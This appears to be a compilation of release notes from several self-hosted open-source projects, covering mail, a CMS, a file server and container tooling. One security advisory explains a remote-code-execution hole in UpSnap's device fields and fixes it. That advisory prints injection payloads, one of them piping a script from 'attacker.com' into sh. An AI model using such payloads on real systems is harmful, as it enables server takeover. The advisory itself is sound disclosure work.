1.7.2 (2026-05-28)

Features

• Mail: Scheduled send and send delay (#322)
• Mail: Drag emails out to the file explorer as .eml
• Mail: Import emails from .zip archives
• Mail: "Move to Trash and mark as read" delete action (#323)
• Mail: Include group inboxes in the unified mailbox view (#328)
• Mail: Locale-aware date format in the email list with a preset picker (#331)
• Mail: Allow drag-and-drop into shared mailboxes
• Composer: Ctrl/Cmd+Enter sends the open draft
• Settings: New Downloads tab with template editor for .eml and attachment filenames
• Settings: Filename transform settings and an ASCII-only "date (from-to) subject" template
• Settings: Post-export action (keep / archive / trash)
• Settings: Template for multi-email .zip filenames
• Admin: Per-domain branding editor with overrides on /api/config, manifest, and PWA icon (#332)
• Admin: Policy-controlled push relay URL with optional user lock
• i18n: NEXT_PUBLIC_DEFAULT_LOCALE for fallback UI locale (#243)

Fixes

• Mail: Editable HTML signature in new mail; clean state on every compose entry (#329)
• Mail: Report real upload progress with XHR progress events (#333)
• Mail: Restore blob: in object-src and frame-src CSP for PDF/HTML previews
• Mail: Match user-avatar treatment on quick reply
• Email viewer: Stop shattering table cells with word-break: break-word
• Composer: Scope Ctrl/Cmd+Enter send to the focused composer
• Composer: Stop closing the form when editing any field
• Pro: Keep the empty viewer pane visible in the split layout
• Pro: Prevent an empty main pane when reordering tabs across panes
• Mobile: Collapse focus mail layout to multi-line
• Mobile: Keep a gutter on bare-HTML and plain-text emails
• Calendar: Align continued multi-week events with the week's left edge
• Calendar: Show the end date in the event popover for multi-day events (#318)
• Calendar: Convert recurrenceRules to singular in batch create
• Calendar: Handle malformed event dates (#316)
• Files: Stop URL-encoding drag-out filenames and preserve Unicode letters
• Routing: Prefix remaining <img>, favicon, and WebDAV URLs with basePath (#319)
• Routing: Prefix hand-written URLs with basePath for subpath deployments
• Auth: OAUTH_ALLOW_PRIVATE_ENDPOINTS for split-DNS setups

i18n

• Add missing translation keys across 16 locales

Links

• Release video overview
• Update instructions
• Update details on blog

Upgrade Notices

• Folder Permissions - Due to some changes in how fonts are used for exports, after updating you may need to ensure that the storage/fonts folder (and all folders within that) are accessible & writable by the web-server. If you start seeing errors on PDF export after updating, it's likely this issue. See this page for guidance on setting permissions.
• Revision Access - Revision access & visibility is now controlled separately to pages. In some cases, after upgrading, users may no longer be able to access revisions by default (for example, where users had access to view page content but had no role-level view permissions).

Full List of Changes

• Added page contents view to page editor. (#6131, #4218)
• Added API endpoints for browsing tags. (#6095, #5835)
• Added custom font load handling for default PDF renderer. (#6109, #148, #719, #5770)
• Added in-UI option to reset user multi-factor authentication methods. Thanks to @clauvaldez. (#6056)
• Added hints to sort rule selection alongside empty lists. (#5967)
• Added specific permission for revision viewing. (#6108, #4526)
• Added new image and CSS CSP controls. Thanks to @Zhey-on. (#6071, #6033)
• Added Thai language support. (#6105)
• Updated codebase to meet PHPStan Level 4. (#6085)
• Updated comment/description WYSIWYG editor to support inline code. (#6100, #6003)
• Updated HTML to plain text conversion handling. (#6083)
• Updated image upload handling to validate referenced page. (#6126)
• Updated JavaScript packages. (#6090)
• Updated module install command with usability improvements. (#6094, #6066)
• Updated new WYSIWYG editor with a range of fixes. (#6119, #5631)
• Updated translations with latest Crowdin changes. (#6084)
• Fixed misaligned link attachment validation rules. (#6093)
• Fixed non-ascii character issues in headers on PDF exports. Thanks to @alexwoo-awso. (#6069, #6107)

5.47.0 (2026-05-28)

🚀 New feature

• BETA: MCP server (#26371)
• publicationFilter param in REST and document service (#25793)
• admin-tokens: remove adminTokens future flag (#26391)
• admin: add documentation helper link in HeaderLayout (#26422)

🔥 Bug fix

• Relation Search in Nested Components (#26023)
• unable to access content manager page with required and private … (#24101)
• admin: gate expiresIn deprecation on user auth options (#26298)
• admin: redirect active tab to login on session expiry (#26165)
• admin: avoid serving extensionless admin paths as static files (#26368)
• content-manager: content history crash on deleted relations (#26245)
• core: preserve createdBy/updatedBy on drafts created by discard-drafts migration (#26461)
• core/core: codeBlockValidator uses language instead of syntax (#26392)
• graphql: inherit publicationFilter into populated relations (#26400)

⚙️ Chore

• dedupe yarn.lock file (#26376)
• fix dependabot cooldown config for github-actions (#26438)
• ci: improve dependabot security grouping and version update policy (#26408)
• commitlint: disable body-max-line-length rule (#26406)
• deps: bump simple-git from 3.32.3 to 3.36.0 (#26220)
• deps: bump sanitize-html from 2.13.0 to 2.17.4 (#26342)
• deps: bump ws from 8.17.1 to 8.20.1 in @strapi/data-transfer (#26379)
• examples: remove sdk-plugin from todo-example plugin (#26341)
• strapi: upgrade webpack ecosystem dependencies (#26385)

💅 Enhancement

• db: migration performance improvements (#25988)
• provider-amazon-ses: replace node-ses with AWS SDK SESClient (#26054)
• i18n: update and create Slovak translations (#25831)

❤️ Thank You

• Adrien L @Adzouz
• Andrei L @unrevised6419
• Arav Menon @Arav-Menon
• bartsmartshore @bartsmartshore
• Bassel Kanso @Bassel17
• Ben Irvin @innerdvations
• Dhruv Chheda @chhedadhruv
• DMehaffy @derrickmehaffy
• Filip Ónodi @fonodi
• Nico André @nclsndr
• Sjouke de Vries @sjoukedv
• Vishal Kumar Singh @singhvishalkr

• read-only demo server at https://a.ocv.me/pub/demo/
• docker image ╱ similar software ╱ client testbed

there is a discord server with an @everyone in case of future important updates, such as vulnerabilities (most recently 2026-03-08)

recent important news

• v1.20.9 (2026-02-25) fixed CVE-2026-27948 (XSS)

🧪 new features

• #1463 opds: improved compatibility with various clients (thx @kamaeff!) 9068ec6
• #1485 users with read-access can now create get-only shares (thx @Scotsguy!) 0bb80e9
• #1466 support the s6 service notification protocol (thx @mobin-2008!) 8c201b8 ca40647
• download-as-zip/tar: the toplevel folder can be renamed with url-param &name=foo or entirely removed with &name cc5420a
• #1487 option to generate music spectrograms with logarithmic frequency scale (thx @9hax!) 83dc20f
• option to set custom name/path for ffmpeg/ffprobe binaries 5e806ec
• #1489 audio playback of mka files

🩹 bugfixes

• #1480 #1482 fix get-only shares not expiring if the creator is removed (thx @celinke97 and @Scotsguy!) 3b53a22
• #1474 toggling between cropped/fullsize coverart for music didn't work 926c6e8
• #1470 files from the year 30828 would break file listing 27031f7
• #1494 fix js-crash when dragging a pic from the gallery out of the browser (thx @icxes!) 7d81b9e
• "fancy markdown editor" didn't work on phones 6183540
• improve signal handling f4f97b6
  • if I messed something up then --sig-thr or send 7x sigterm

🔧 other changes

• docker: the arm32 build of the iv image has graduated 6e75faa
  • copyparty/iv is now only available for i386 / x86_64 / aarch64
• docker: rawpy is no longer bundled; now using libraw directly 348b4bb
  • creating thumbnails of .raw photos is now MUCH slower but quality is also much better
• partyfuse: switch to mfusepy; adds fuse3 support and improves performance b2401ff
• additional advisory tiers for use with the vulnerability-checker 4e9ad78
• clarify behavior of xvol regarding permissions e327183
• packaging/docs:
  • #1479 freebsd: fix deps in rc.d (thx @Kansattica!) f432ef6
  • #1458 macos docs (thx @ilotoki0804!) d7eb556

🌠 fun facts

• there will be a tiny handful of copyparty stickers at dokomi this weekend

💾 what to download?

• except for u2c.exe, all of the options above are mostly equivalent
• the zip and tar.gz files below are just source code
• python packages are available at PyPI

New Setup Process

GHSA-w4jr-728f-5jhq

What changed

The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

RCE via Device IP and MAC Address Injection

GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

1. Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.

2. Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.

3. HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

• 74633e7: fix: use token based superuser setup (@seriousm4x)
• 43f3f65: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

• dfaf0ee: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
• 8b08585: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
• 92f9e29: update deps (@seriousm4x)

v1.20.15

New features

• Added browser plugin to quickly submit pages from a browser to Part-DB to create parts out of it. As it submits the browser HTML, this allows also for info extraction from pages like ebay, amazon or aliexpress. Plugin is available for Chrome and Firefox
• Added an "unsaved changes" warning, on when a form contains unsaved changes and user tries to navigate away (#1368)
• Changed/Unsaved fields get highlighted with a light blue border in forms
• The discard changes button also now correctly works with rich text editor fields and select fields.

Bug fixes

• Fixed problem with attachment referencing in API (#1370)

Miscellaneous

• Updated dependencies
• Updated translations
• Updated kicad symbols

Full Changelog: v2.11.1...v2.12.0

Bug fixes

• improve environment proxy error handling (#2649 by @kmendell)
• align local BuildKit load/push exporter (#2650 by @kmendell)
• PUID and PGID being set on project subfolder on every startup (#2656 by @kmendell)
• system upgrade doesnt support non unix socket docker hosts (#2651 by @kmendell)
• resizing window discards edits in compose editors (#2719 by @kmendell)
• only validate project name if it has changed (#2720 by @kmendell)
• make Arcane reverse-proxy aware to resolve connection issues (#2717 by @kmendell)
• tolerate undefined typed env vars in GitOps sync (#2721 by @kmendell)
• show all container ip's in list view (#2726 by @kmendell)

Dependencies

• bump pnpm to v11.1.3(fb8f2f5 by @kmendell)
• bump devalue to 5.8.1(2ed772d by @kmendell)
• bump ws to 8.20.1(47c4f81 by @kmendell)
• bump github.com/go-git/go-git/v5 from 5.19.0 to 5.19.1 in /backend in the go_modules group across 1 directory (#2654 by @dependabot[bot])
• bump @sveltejs/kit from 2.58.0 to 2.60.1 in the npm_and_yarn group across 1 directory (#2662 by @dependabot[bot])
• bump github.com/containerd/containerd/v2 from 2.3.0 to 2.3.1 in /backend in the go_modules group across 1 directory (#2663 by @dependabot[bot])
• bump golang.org/x/crypto from 0.51.0 to 0.52.0 in /backend (#2664 by @dependabot[bot])
• bump github.com/docker/cli from 29.5.0+incompatible to 29.5.2+incompatible in /backend (#2666 by @dependabot[bot])
• bump github.com/compose-spec/compose-go/v2 from 2.10.2 to 2.11.0 in /backend (#2665 by @dependabot[bot])
• bump date-fns from 4.1.0 to 4.2.1 (#2675 by @dependabot[bot])
• bump github.com/docker/compose/v5 from 5.1.3 to 5.1.4 in /backend (#2670 by @dependabot[bot])
• bump go.podman.io/image/v5 from 5.39.2 to 5.40.0 in /backend (#2667 by @dependabot[bot])
• bump github.com/compose-spec/compose-go/v2 from 2.10.2 to 2.11.0 in /types (#2668 by @dependabot[bot])
• bump github.com/getarcaneapp/arcane/types from 1.19.1 to 1.19.4 in /cli (#2669 by @dependabot[bot])
• bump marked from 18.0.3 to 18.0.4 (#2679 by @dependabot[bot])
• bump svelte from 5.55.7 to 5.55.9 (#2672 by @dependabot[bot])
• bump @codemirror/autocomplete from 6.20.1 to 6.20.2 (#2673 by @dependabot[bot])
• bump @codemirror/legacy-modes from 6.5.2 to 6.5.3 (#2671 by @dependabot[bot])
• bump pnpm to v11.2.2(74f7ec4 by @kmendell)
• bump react and @types/react (#2682 by @dependabot[bot])
• bump frontend deps(7fe4f34 by @kmendell)
• bump prettier-plugin-svelte from 3.5.2 to 4.0.1(a2fbf3e by @kmendell)
• bump github.com/aws/aws-sdk-go-v2/credentials from 1.19.16 to 1.19.17 in /backend (#2705 by @dependabot[bot])
• bump golang.org/x/net from 0.54.0 to 0.55.0 in /backend (#2696 by @dependabot[bot])
• bump golang from 1.26-trixie to 1.26.3-trixie in /docker (#2708 by @dependabot[bot])
• bump github.com/aws/aws-sdk-go-v2/config from 1.32.17 to 1.32.18 in /backend (#2700 by @dependabot[bot])
• bump golangci/golangci-lint-action from 9 to 9.2.0 (#2714 by @dependabot[bot])
• bump github/codeql-action from 4 to 4.35.5 (#2713 by @dependabot[bot])
• bump @uiw/codemirror-themes from 4.25.9 to 4.25.10 (#2712 by @dependabot[bot])
• bump depot/build-push-action from 1 to 1.17.0 (#2716 by @dependabot[bot])
• bump docker/login-action from 4 to 4.1.0 (#2715 by @dependabot[bot])
• bump react-email from 6.1.1 to 6.2.0 (#2711 by @dependabot[bot])

Other

• run workflows on breaking branches(993d27f by @kmendell)

Full Changelog: v1.19.4...v1.19.5

1.19.5

1.19.5

1.19.5

1.7.1 (2026-05-22)

Features

• Admin: Expose PWA branding fields in the admin Branding tab
• Pro: Hide empty-state placeholder and collapse the viewer pane in Pro mode so the mail list fills the space

Fixes

• Mail: Preserve inline images when replying (#163)
• Filters: Use the canonical INBOX mailbox in Sieve filter paths (#313)
• Mail: Resolve destination account id to the local namespace on cross-account mailbox drop

1.7.0 (2026-05-21)

New: Pro mode (experimental)

Opt-in tabbed multi-pane interface for power users. Open multiple mail, calendar, contacts, and file views side-by-side, drag tabs to reorder or split panes at the edges, and work across all logged-in accounts in one shell, cross-account email moves, a unified inbox with search, account-split calendar/contacts/files sidebars, and a per-account "From" dropdown in the composer. Enable from Settings → Appearance; the proInterface preference is per-device and not synced.

Pro mode is experimental and we need your feedback to shape it. If something feels off, breaks, or is missing, please don't hesitate to open an issue or start a discussion on GitHub!

Breaking Changes

• Plugins: Plugins now run inside a null-origin iframe sandbox and talk to the host over a postMessage RPC bridge. The in-process plugin runtime is gone; the bundled in-tree plugins have been migrated. Third-party plugins built against the old in-process API need to be ported to the sandboxed runtime.
• Plugins: Server-managed bundles must be Ed25519-signed by the host and approved by an admin before they load. The host public key is served from /api/plugin-signing-pubkey and each bundle response carries the signature in the X-Bundle-Signature header. User-uploaded bundles still load unsigned, but managed marketplace and dev-folder bundles do not.
• Plugins: bundleHash is now a full SHA-256 over the bundle. Legacy short hashes are migrated on first load; any out-of-band tooling that pinned the old hash format needs to be updated.

Features

• Pro: Tabbed shell with drag-to-reorder, drag-to-edge to split, side-by-side panes, and pane-aware responsive layout with a scoped sidebar overlay
• Pro: Auto-redirect to the Pro shell when Pro mode is on; proInterface is kept per-device instead of syncing
• Pro: Multi-account mail sidebar with client routing and a per-account mailbox cache
• Pro: Unified mailbox always visible, with full-text search
• Pro: Cross-account email moves
• Pro: Multi-account calendar sidebar split into owned vs shared per account
• Pro: Multi-account contacts and a cross-account file picker
• Pro: Composer From dropdown grouped by account
• Plugins: Per-plugin admin approval workflow with Ed25519 bundle signing verified on load
• Plugins: Marketplace update flow for installed plugins and themes
• Setup: Allow the setup wizard over plain HTTP with a dismissable warning gate
• Setup: Warn when the JMAP URL points at a local-only host
• Account: List and reorder logged-in accounts from settings (#282)
• Mail: Mobile handoff page with JMAP authentication verification for cross-device OAuth
• Mail: Pluggable reply/forward quote header (#295)
• Calendar: Support multiple flexible event reminders (#170)
• Admin: Expose PWA, app identity, and extension directory keys in the JSON config (#312)
• Admin: Surface OAuth scope settings and wire up orphaned admin policy gates

Security

• Plugins: Pin parent origin in the iframe bridge to block cross-frame postMessage
• Plugins: Ignore plugin-supplied target in ui.openExternalUrl to block host-frame hijack
• Plugins: Validate plugin/theme id in marketplace install to block path traversal
• Plugins: Prevent plugin config from leaking to non-admin users
• Admin: Gate admin routes against cross-origin CSRF
• Auth: Bind Stalwart auth context to the credential, not the cookie-claimed username
• Auth: Validate OAuth discovery endpoints against SSRF
• Mail: Tighten HTML sanitization at plain-text email, signature, and i18n render sites
• Mail: Block script-bearing MIME types from inline attachment preview
• Mail: Escape print-window fields and re-sanitize body to block XSS
• S/MIME: Stop persisting passphrases in sessionStorage
• API: Correct regex for valid API POST path validation

Fixes

• Mail: Serialize draft autosave with send to stop replies stalling in Drafts (#303)
• Mail: Omit empty cc/bcc from Email/set so the server does not emit a bare Cc: header (#301)
• Mobile: Allow adding contacts from the mail recipient popover (#306)
• Mobile: Prevent dual-scroll and use full width for mail content
• Mobile: OAuth handoff flow
• Calendar: Scope iCal subscriptions per JMAP account; fix refresh and clear
• Calendar: iCal subscription refresh, rollback, and URL normalization
• Calendar: Show avatars in the calendar/address book sharing menu
• Contacts: Normalize malformed contact photo data URIs (#307)
• Identity: Clear identity signature fields when emptied
• Identity: Show size cap on identity signature fields
• Identity: Allow table-based layouts in the HTML signature sanitizer
• Plugins: Load globals.css and Geist font in the plugin sandbox iframe
• Plugins: Sync plugin slot iframe height with reported content height
• Plugins: Use plugin slot offer snapshots for useSyncExternalStore
• Plugins: Trust the directory version on marketplace install and update
• Filters: Prevent duplication of Bulwark rules with literal braces in values
• Setup: Defer setup wizard HTTP detection to avoid hydration mismatch
• Routing: Anchor unmatched URLs into main so 404 renders
• Routing: Respect server-resolved locale on first visit (#309)
• Routing: Split app into (main)/(sandbox) route groups so the plugin iframe hydrates properly
• Files: Stop parent directory navigation from jumping to root
• Build: Stop pulling node:dns into the client bundle via OAuth discovery
• UI: Toggle recipient popover when clicking the name again
• UI: Remove white halo around photo avatars

i18n

• Add missing translation keys across 16 locales

Security Release

• Update Instructions
• Update details on blog

This is a security release to address a brute-force based vulnerability related to multi-factor authentication, and to update project libraries to help avoid potential vulnerabilities that have been reported in those.

Upgrade is generally advised, but strongly so where multi-factor authentication is used & considered as a critical layer of defense.

Thanks to Stephen O. / Sakusen (Codeberg, Website) for responsibly reporting these issues.

Full List of Changes

• Updated PHP package versions.
• Updated MFA verification routes with rate limiting.

• Milestone

This is bug-fix release for 1.29.0.

Feature highlights✨:

• Accept .txt import of feed URLs in additional to e.g. OPML
• New CLI for automatic periodic SQLite export with retention
• More feed info: last received date, publication date

Bug fixes highlights 🐛:

• Fix cookies with some browsers
• Fix search in shared user queries with empty results

UI highlights 🖼:

• Improve Web browsers compatibility

This release has been made by @Alkarex, @Frenzie, @IEEE-754, @Inverle, @McFev, @ciro-mota, @cweiske, @polybjorn and newcomer @mzl2233

Full changelog:

• Features
  • Accept .txt import of feed URLs in additional to e.g. OPML #8818, #8837
  • New CLI for automatic periodic SQLite export with retention #8819
  • More feed info: last received date, publication date #8799
• Bug fixing
  • Fix cookies with some browsers #8867
  • Fix search in shared user queries with empty results #8863
  • Fix XML errors with loading invalid OPML in lib_opml library #8652, #8853,
    lib_opml#48, lib_opml#51
  • Fix ensure maximum number of feeds also with Dynamic OPML #8832
  • Fix click mark as read #8817
• UI
  • Improve browser compatibility to keep mobile navigation at the bottom #8833
  • Improve support of older/simpler Web browsers/engines such as SeaMonkey #8810,
    #8811, #8813,
  • Improve Swage theme #8842
  • Rename Nord theme to Nord #8805
  • Replace GIF spinner by CSS spinner #8804, #8812
  • Various UI and style improvements: #8800, #8816,
• I18n
  • Improve Brazilian Portuguese #8846
  • Improve Dutch #8868
  • Improve German #8840
  • Improve Polish #8854
  • Improve Russian #8861
  • Improve Traditional Chinese #8849
• Misc.
  • Update dev dependencies #8858, #8864

5.46.1 (2026-05-20)

🔥 Bug fix

• FK violation publishing self-relation parent & child in one release (#26147)
• move session-manager jwt check from register to bootstrap (#25412)
• admin: remove year 2041 limit on date/datetime pickers (#26209)
• content-manager: fix getMainField context for component list/edit configure views (#25509, #26124)
• database: respect nested sort in populate for join-table relations (#26361)
• graphql: inherit publication state for i18n localizations (#22163)
• migrations: guard inverseJoinColumn access in discard-drafts migration (#26331)
• review-workflows: add assignee and review stage to list view filters (#26171)
• review-workflows: message when single stage (#26229)
• upgrade: use pnpm install when project prefers pnpm (#26246)
• upgrade: align scoped @strapi packages in devDependencies (#26248)

⚙️ Chore

• sonarcloud security review (#25949)
• deps: bump ip-address from 10.1.0 to 10.2.0 (#26222)
• deps: bump @protobufjs/utf8 from 1.1.0 to 1.1.1 (#26311)
• deps: bump axios from 1.15.1 to 1.15.2 (#26177)
• deps: bump fast-xml-builder from 1.1.4 to 1.2.0 (#26253)
• deps: bump fast-uri from 3.0.1 to 3.1.2 (#26254)
• eslint: migrate .eslintrc + .eslintignore to .eslintrc.cjs (#26216)

🚨 Security

• deps: upgrade multiple dependencies (#26326)

❤️ Thank You

• Adrien L @Adzouz
• Andrei L @unrevised6419
• Ben Irvin
• Garrett Heaver @garrettheaver
• jmichalec-vl
• Maksim Zhukau @MaksZhukov
• Simen @Eventyret
• Simon Norris @cache-your-dreams
• Westley Marchment

Bug fixes

• block unsafe compose include file reads (#2630 by @kmendell)
• add missing gRPC/ws tunnel commands (#2636 by @kmendell)
• unable to use templates due to 'not found' error (#2634 by @kmendell)
• retry rate limited update checks (#2639 by @kmendell)
• prevent projects from disappearing when projects folder is unreadable (#2641 by @kmendell)
• release notes not populated for manager instance (#2643 by @kmendell)

Other

• publish manager and agent image tags (#2645 by @kmendell)
• use trivy-db mirrors from arcane-tools (#2646 by @kmendell)

Full Changelog: v1.19.3...v1.19.4

1.19.4

1.19.4

1.19.4

1.6.7 (2026-05-17)

Features

• Contacts: vCard 4.0 parsing and generation support
• Admin: Master-user impersonation route with app-top-banner plugin slot rendered on every authenticated page
• Admin: Allow admin password overwrite during setup recovery
• Setup: HTTPS requirement warning in the setup wizard
• Mobile: Show details toggle and expandable panel for sender info

Performance

• Calendar: Speed up calendar invitation banner load

Security

• Mail: Sandbox thread email HTML in srcDoc iframe with a CSP <meta> tag
• Admin: Redact sensitive config secrets from the admin API response
• Admin: Make impersonation cookies session-only

Fixes

• Auth: Read OAUTH_SCOPES at runtime instead of build time
• Auth: Use a relative Location header in redirects
• Auth: Adopt orphan session cookie on first SPA load
• Mail: Per-account push subscriptions so multi-account notifications work (#298)
• Mail: Close attachment preview when clicking outside the content area
• Mail: Pin quick reply to the bottom for short emails
• Mail: Show "no body content" instead of an infinite skeleton for bodyless emails
• Mail: Show contact popup when clicking the sender name in the email header
• Mail: Prevent long addresses from overflowing email details columns (#297)
• Mobile: Align quick reply with the mobile bottom toolbar
• Mobile: Respect safe-area insets on mobile bottom bars
• Mobile: Pad safe-area-inset-top
• UI: Apply dark background to the email content wrapper in dark mode
• UI: Improve dark mode background colors in the email viewer
• UI: Add viewport export with initialScale: 1
• UI: Strip the Stalwart master-user % suffix from the displayed account
• Plugins: Warn and block install when the app version is below the plugin's minAppVersion
• Plugins: Register app-top-banner in plugin-store SLOT_NAMES
• Plugins: Carry configSchema + settingsSchema through marketplace install
• Build: Add outputFileTracingExcludes to reduce Turbopack memory tracing

i18n

• Add missing translation keys across 16 locales

Bug fixes

• remove gzip middleware from agent endpoints (#2627 by @kmendell)

Full Changelog: v1.19.2...v1.19.3

1.19.3

1.19.3

1.19.3

Bug fixes

• remove intel-gpu-tools from docker images since its has no effect currently(fea78a5 by @kmendell)
• allow hiding default networks on typology view (#2594 by @kmendell)
• refresh project detail runtime status (#2602 by @kmendell)
• allow LOGIN email authentication type (#2603 by @kmendell)
• keep session across backend version bumps (#2607 by @kmendell)
• missing store prefix on test connection form(5f1645f by @kmendell)
• swarm engine not respecting cpu limits (#2617 by @kmendell)
• only perform auto pairing on edge edgent not direct (#2622 by @kmendell)
• container cache leak from docker subscription (#2624 by @kmendell)

Performance improvements

• increase loading times of project list view (#2596 by @kmendell)

Dependencies

• bump to go 1.26.3(8e819fe by @kmendell)
• bump all go deps(6817e70 by @kmendell)
• bump the npm_and_yarn group across 1 directory with 2 updates (#2600 by @dependabot[bot])
• bump svelte from 5.55.5 to 5.55.7 in the npm_and_yarn group across 1 directory (#2601 by @dependabot[bot])
• bump github.com/danielgtaylor/huma/v2 from 2.37.3 to 2.38.0 in /backend (#2612 by @dependabot[bot])
• bump github.com/docker/cli from 29.4.3+incompatible to 29.5.0+incompatible in /backend (#2613 by @dependabot[bot])
• bump google.golang.org/grpc from 1.81.0 to 1.81.1 in /backend (#2610 by @dependabot[bot])
• bump prettier-plugin-svelte from 3.5.1 to 3.5.2 (#2618 by @dependabot[bot])

Other

• create admin role middleware for each endpoint (#2593 by @kmendell)
• consolidate digest and image updater logic (#2623 by @kmendell)

Full Changelog: v1.19.1...v1.19.2

1.19.2

1.19.2

1.19.2

1.6.6 (2026-05-15)

Features

• Mail: Sync onboarding completion state across devices so the welcome flow only runs once per account (#285)
• Mail: Distinct icons for Shared, Important, Memos, Scheduled, and Snoozed folders (#288)
• Compose: Raise HTML identity signature length cap to 50,000 characters
• Compose: Allow <img> tags in HTML identity signatures for inline logos and banners

Fixes

• Files: Hide Files settings entry and sidebar nav when the filesEnabled policy is off (#291)
• Admin: Honor the cookieSameSite admin config override instead of always defaulting (#284)
• UI: Standardize punctuation in tooltips and inline comments across locales

i18n

• Add Danish localization
• Clean up Danish locale wiring and sort the language picker alphabetically (#286)